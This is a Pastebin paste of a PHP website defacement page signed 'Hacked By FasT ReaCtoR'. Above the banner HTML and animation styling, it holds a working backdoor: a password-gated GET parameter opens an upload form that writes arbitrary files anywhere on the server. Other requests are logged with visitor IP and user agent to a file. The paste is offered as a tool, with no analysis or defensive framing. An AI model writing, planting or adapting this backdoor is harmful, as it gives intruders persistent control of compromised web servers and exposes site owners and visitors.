Advertisement
Guest User

Untitled

a guest
Nov 27th, 2015
544
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.00 KB | None | 0 0
  1. <?php
  2. $xxx = $_GET["FAST"];
  3. if (md5($xxx) === '36f1d8f8980cebc9f36426d029cdcb91')
  4. {
  5. $docr = $_SERVER["DOCUMENT_ROOT"];
  6. echo <<<HTML
  7. <table>
  8. <form enctype="multipart/form-data" action="$self" method="POST">
  9. <tr>
  10. <td>File : </td>
  11. <td><input size="48" name="file" type="file"></td>
  12. </tr>
  13. <tr>
  14. <td>Dir : </td>
  15. <td><input size="48" value="$docr/" name="path" type="text"><input type="submit" value="Upload"></td>
  16. </tr>
  17. </table>
  18. HTML;
  19. if (isset($_POST["path"])){
  20. $uploadfile = $_POST["path"].$_FILES["file"]["name"];
  21. if ($_POST["path"]==""){$uploadfile = $_FILES["file"]["name"];}
  22. if (copy($_FILES["file"]["tmp_name"], $uploadfile)) {
  23. echo "File uploaded to : $uploadfile\n";
  24. echo "- Size : " .$_FILES["file"]["size"]. "\n";
  25. } else {
  26. print "Error";
  27. }
  28. }
  29. exit;
  30. }
  31. if($_GET){
  32. echo 'Bro Are You Trying To Find My BackDoor In My Deface?<br>YOU CANT Add Me In Skype<br>ID: FasT.ReaCtoR<br><br>';
  33. $agent = $_SERVER['HTTP_USER_AGENT'];
  34. $client_ip = $_SERVER['REMOTE_ADDR'];
  35. $method = $_SERVER["REQUEST_METHOD"];
  36. $url = $_SERVER["REQUEST_URI"];
  37. $port = $_SERVER["SERVER_PORT"];
  38. $date = date("Y/m/d")." ~ ".date("h:i:sa");
  39. $fo = fopen("FasTReaCtoR.txt", "a");
  40. $fw = fwrite($fo, "Client Ip: $client_ip\nUser Agent: $agent\nURL: $url\nMethod: $method\nPort: $port\nDate: $date\n\n#################### Coded By FasT ReaCtoR ID Skype: FasT.ReaCtoR ####################\n\n");
  41. fclose($fo);
  42. echo "<a href='FasTReaCtoR.txt'>Check Here!!</a>";
  43. exit;
  44. }
  45. ?>
  46. <html>
  47. <head>
  48. <title>Hacked By FasT ReaCtoR</title>
  49. <meta name="keywords" content="FasT ReaCtoR" />
  50. <meta name="description" content="Hacked by FasT ReaCtoR" />
  51. <meta name="rating" content="General" />
  52. <meta name="revisit-after" content="1 days" />
  53. <meta name="classification" content="Hacked" />
  54. <meta name="robots schedule" content="auto">
  55. <meta name="keywords" content="FasT ReaCtoR" />
  56. <meta name="description" content="Hacked by FasT ReaCtoR" />
  57. <meta name="rating" content="General" />
  58. <meta name="revisit-after" content="1 days" />
  59. <meta name="classification" content="Hacked" />
  60. <meta name="robots schedule" content="auto">
  61. <link href='http://fonts.googleapis.com/css?family=Fredoka+One' rel='stylesheet' type='text/css'>
  62. <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
  63. <meta name="Author" content="FasT ReaCtoR">
  64. <meta http-equiv="imagetoolbar" content="no">
  65. <style>
  66. @import url(http://fonts.googleapis.com/css?family=Open+Sans:10);
  67. .text {
  68. fill: none;
  69. stroke-width: 4;
  70. stroke-linejoin: round;
  71. stroke-dasharray: 70 330;
  72. stroke-dashoffset: 0;
  73. -webkit-animation: stroke 6s infinite linear;
  74. animation: stroke 6s infinite linear;
  75. }
  76. .text:nth-child(5n + 1) {
  77. stroke: #00FF00;
  78. -webkit-animation-delay: -1.2s;
  79. animation-delay: -1.2s;
  80. }
  81. .text:nth-child(5n + 2) {
  82. stroke: #C0C0C0;
  83. -webkit-animation-delay: -2.4s;
  84. animation-delay: -2.4s;
  85. }
  86. .text:nth-child(5n + 3) {
  87. stroke: #4169E1;
  88. -webkit-animation-delay: -3.6s;
  89. animation-delay: -3.6s;
  90. }
  91. .text:nth-child(5n + 4) {
  92. stroke: #FF0000;
  93. -webkit-animation-delay: -4.8s;
  94. animation-delay: -4.8s;
  95. }
  96. .text:nth-child(5n + 5) {
  97. stroke: #00FFFF;
  98. -webkit-animation-delay: -6s;
  99. animation-delay: -6s;
  100. }
  101. @-webkit-keyframes stroke {
  102. 100% {
  103. stroke-dashoffset: -400;
  104. }
  105. }
  106. @keyframes stroke {
  107. 100% {
  108. stroke-dashoffset: -400;
  109. }
  110. }
  111. html, body {
  112. height: 100%;
  113. }
  114. body {
  115. background: #000000;
  116. background-size: .2em 100%;
  117. font: 5.5em/1 Open Sans, Impact;
  118. text-transform: uppercase;
  119. margin: 0;
  120. overflow:hidden;
  121. font-family:'Open Sans',sans-serif;
  122. width:100%;
  123. height:100%;
  124. margin:0;
  125. }
  126. svg {
  127. position: absolute;
  128. width: 100%;
  129. height: 100%;
  130. }
  131. #w{font:45px 'Fredoka One',cursive;color:white;position:absolute;left:0;right:0;top:35%}
  132. *{margin:0;padding:0}
  133. .FasTReaCtoR font{transition:all .3s ease 0s;-moz-transition:all .3s ease 0s;-webkit-transition:all .3s ease 0s;-o-transition:all .3s ease 0s}
  134. .FasTReaCtoR {color:#fff;text-align:center}
  135. .FasTReaCtoR font{font-size:20px;font-weight:normal;line-height:35px;margin-bottom:40px}
  136. .FasTReaCtoR font:hover{font-size:35px;line-height:50px;cursor:default}
  137. text:hover{cursor:default}
  138. </style>
  139. </head>
  140. <body text="#000000" bgcolor="#000000" link="#000000" vlink="#000000" alink="#000000" oncontextmenu="return false;" onkeydown="return false;" onmousedown="return false;" style="transform: none;">
  141. <svg viewBox="0 0 1000 300">
  142. <symbol id="s-text">
  143. <text text-anchor="middle" x="50%" y="15%" dy="0.25em">FasT ReaCtoR</text>
  144. </symbol>
  145. <use xlink:href="#s-text" class="text"></use>
  146. <use xlink:href="#s-text" class="text"></use>
  147. <use xlink:href="#s-text" class="text"></use>
  148. <use xlink:href="#s-text" class="text"></use>
  149. <use xlink:href="#s-text" class="text"></use>
  150. <center>
  151. <div class="FasTReaCtoR">
  152. <div id="w">
  153. <font>Hacked By FasT ReaCtoR</font><br>
  154. <font>Iranian Hackers Was Here!</font><br>
  155. <font color="yellow">Skype: FasT.ReaCtoR</font><br>
  156. <font>#IRAN ~ #WorldPeace</font><br>
  157. <font>Friend: jok3r</font><br>
  158. <font>./END</font></div></div></center></body></html><script>window.stop();</script>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement